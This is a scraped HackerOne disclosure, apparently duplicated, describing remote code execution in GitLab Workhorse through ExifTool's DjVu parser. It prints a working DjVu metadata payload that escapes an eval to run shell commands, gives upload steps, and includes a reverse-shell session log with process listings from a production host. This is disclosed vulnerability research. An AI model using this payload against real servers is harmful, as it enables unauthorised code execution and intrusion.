0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T13:29:47", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T13:29:47", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T13:29:47", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ2PG5GSV7%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T132946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEHwaCXVzLXdlc3QtMiJHMEUCIQCrkq6Ezmr4tN3wBlMPnJeJ9NQI99I51dQjvn2oMUBJ1QIgPY79xkYgdZJVWrP2Qq5ISzIGzhpusyJ47MJmVEKPsUkq%2BgMIFBACGgwwMTM2MTkyNzQ4NDkiDCt6mElmo9G7UIOSqyrXA8WHjd8Ohgj95VYN20PHSMsxKbm2ocl2RnWVMiwNa8nCu71eyTN4VlTV3wvjOZysKg%2FAIVFNNCwCkJQaSwwdlTR05JcSXCaWLWSs9yYd8yKZmr3Y0qVAUVxmWuqWzWroZahZI7EiA9nUPmjCfil7SzHseoYhcuOR1vSkqLcNpEtM2R6CNAGhdpvff0LYvZeNJyQljx9mJzJU6J8HRbHF1lHuJ7Mkry0YiWJjEvpr5cHhHOtd082lBkdMYEqqJMae5gzr5i3lVmg5iyxm4lF6iJLzjEnGHKL0TSSqvIF26Xv6%2FiP%2F%2FaQXt3y9NBSHhCuvb88I5nmuV9vBBjfPlvBC98Nhfaox0M%2Bkmyy9GfoaC6NQ9UKYlKUJ5jC5HsSy6mf129rcm314o7kBDE%2FSRG6UG%2Bc6%2FDQbun86H80UaIgWfwsra63y26sf5Ikt2kl2dyr389g0hykeuRRuut7e9%2BDdyPVO5q%2BORhPDCenVymKPDbQ5MdOF%2BNtn5l1QyiBC0CApG3x38gZhdri%2F7a5g%2BBBf%2BTLpdW6CkO4XvP2nLG1101sluE0AU35NDGvtXHmjs4iLD3sVj%2F3MrQOEpg2kLTXLQbtoIKax71i0fCtXCdjvxXc5RvVA0NJOVTDa3P6EBjqlAVj6URBTXv8VU45fdDvUk0Xk6lmgfdvsvea5uuSncxPjUZ0qAVqoOIdb4mbWPv8eTUcwZGu0Ouu0C3kuhyqxahxKlhnVoTUKkaxkmzMF5sa3EBkRP2eaoTmB4XER2aYl0PrIINNpfMPsPLwV2%2FKcGfTlkdnPgrzrRsIqCbyEb4o7VFXMJ1dJ3c5Rpj9D%2Fd3YuLNoI072ImjRZECFDvJ2r99kWpCR5g%3D%3D&X-Amz-Signature=c0fcc68b8e708fb2bffd467a05c8db457dc17b2264860ca804c85afbd737334e"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T13:29:47", "differentElements": ["h1reporter"], "edition": 18}, {"bulletin": {"id": "H1:1154542", "hash": "b607d1c039ac037223e9a376a2072dc6", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt 